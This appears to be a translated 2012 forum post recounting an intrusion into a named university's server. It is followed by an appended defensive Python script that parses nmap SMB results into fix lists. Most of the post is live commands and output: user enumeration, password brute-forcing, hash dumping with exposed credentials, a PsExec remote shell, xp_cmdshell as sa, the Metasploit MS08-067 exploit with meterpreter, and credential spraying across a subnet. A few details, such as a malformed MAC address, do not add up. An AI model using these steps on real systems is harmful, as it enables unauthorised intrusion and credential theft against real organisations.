nmap+msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain the user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use msf to exploit the ms08-067 vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
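Added example, not part of the original post and not nmap's own code: every finding the walkthrough above relies on (IPC$ readable anonymously, accounts with blank or guessed passwords, LM hashes still stored, a host reported VULNERABLE by smb-check-vulns) shows up in the "Host script results:" blocks of nmap's normal output, so a defender who runs the same NSE scripts against their own hosts can turn that text into a fix list automatically. The script below parses those blocks and applies one rule per SMB script seen on the page. The function names (parse_host_scripts, audit, Finding), the rule table, and the SAMPLE output (TEST-NET address, made-up hashes) are my own constructions; the only external fact used is that AAD3B435B51404EE is the LM hash half of an empty string, which is why it appears as the second half whenever a password is 7 characters or shorter.

```python
"""Triage nmap host-script output for SMB findings a defender should fix.

Parses the "Host script results:" blocks of nmap normal output for
smb-enum-shares, smb-brute, smb-pwdump and smb-check-vulns.  SAMPLE is
constructed for this example (TEST-NET address, made-up hashes); it is
not the scan output from the post.
"""
import re
from dataclasses import dataclass

# LM hash half of the empty string: the second half of every LM hash of a
# password with 7 characters or fewer, and both halves for a blank password.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM = EMPTY_LM_HALF * 2

HOST_RE = re.compile(r"^Nmap scan report for (?:.*\((\S+)\)|(\S+))$")
SCRIPT_RE = re.compile(r"^\|_?\s*([a-z][\w-]*):\s*$")   # e.g. "| smb-brute:"


@dataclass(frozen=True)
class Finding:
    host: str
    script: str
    severity: str   # "high" or "medium"
    detail: str


def parse_host_scripts(text):
    """Return {host: {script: [output lines with the '|' gutter removed]}}."""
    results, host, script, in_block = {}, None, None, False
    for line in text.splitlines():
        line = line.rstrip()
        m = HOST_RE.match(line)
        if m:
            host, script, in_block = m.group(1) or m.group(2), None, False
            results.setdefault(host, {})
        elif line.startswith("Host script results:"):
            in_block = True
        elif in_block and host is not None:
            if not line.startswith("|"):
                in_block = False             # "Nmap done:" etc. ends the block
                continue
            m = SCRIPT_RE.match(line)
            if m:
                script = m.group(1)
                results[host].setdefault(script, [])
            elif script is not None:
                results[host][script].append(line.lstrip("|_").strip())
    return results


def check_shares(lines):
    share = None
    for line in lines:
        if ":" not in line:
            share = line                     # "ADMIN$", "C$", "IPC$"
        elif line.startswith("Anonymous access:"):
            access = line.split(":", 1)[1].strip()
            if access != "<none>":
                sev = "medium" if share == "IPC$" else "high"
                yield sev, f"share {share} grants anonymous {access} access (null session)"


def check_brute(lines):
    for line in lines:
        m = re.match(r"(\S+?):(\S+) => Login was successful", line)
        if m:
            kind = "blank" if m.group(2) == "<blank>" else "guessable"
            yield "high", f"account {m.group(1)} has a {kind} password"


def check_pwdump(lines):
    for line in lines:
        m = re.match(r"(\S+?):(\d+) => ([^:]+):", line)   # user:rid => LM:NT
        if not m:
            continue
        user, lm = m.group(1), m.group(3).strip().upper()
        if lm.startswith("NO PASSWORD"):
            yield "high", f"account {user} has an empty password"
        elif lm != EMPTY_LM:
            short = " (7 characters or fewer)" if lm.endswith(EMPTY_LM_HALF) else ""
            yield "medium", f"account {user} has an LM hash stored{short}; disable LM hashing"


def check_vulns(lines):
    for line in lines:
        name, _, state = line.partition(":")
        if state.strip().upper().startswith("VULNERABLE"):
            yield "high", f"{name.strip()} reported VULNERABLE; patch and restrict SMB exposure"


RULES = {"smb-enum-shares": check_shares, "smb-brute": check_brute,
         "smb-pwdump": check_pwdump, "smb-check-vulns": check_vulns}


def audit(text):
    """Run every rule over every host; high-severity findings sort first."""
    findings = []
    for host, scripts in parse_host_scripts(text).items():
        for script, lines in scripts.items():
            for severity, detail in RULES.get(script, lambda _: ())(lines):
                findings.append(Finding(host, script, severity, detail))
    return sorted(findings, key=lambda f: (f.severity != "high", f.host, f.script))


SAMPLE = """\
Nmap scan report for bogon (192.0.2.10)
Host is up (0.00035s latency).
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_test:1002 => 0123456789ABCDEFAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"[{f.severity}] {f.host} {f.script}: {f.detail}")
```

Feed it the file written by nmap -oN from an authorised scan of your own hosts; scripts without an entry in RULES are parsed but produce no finding, so adding a rule means adding one generator function and one dictionary entry.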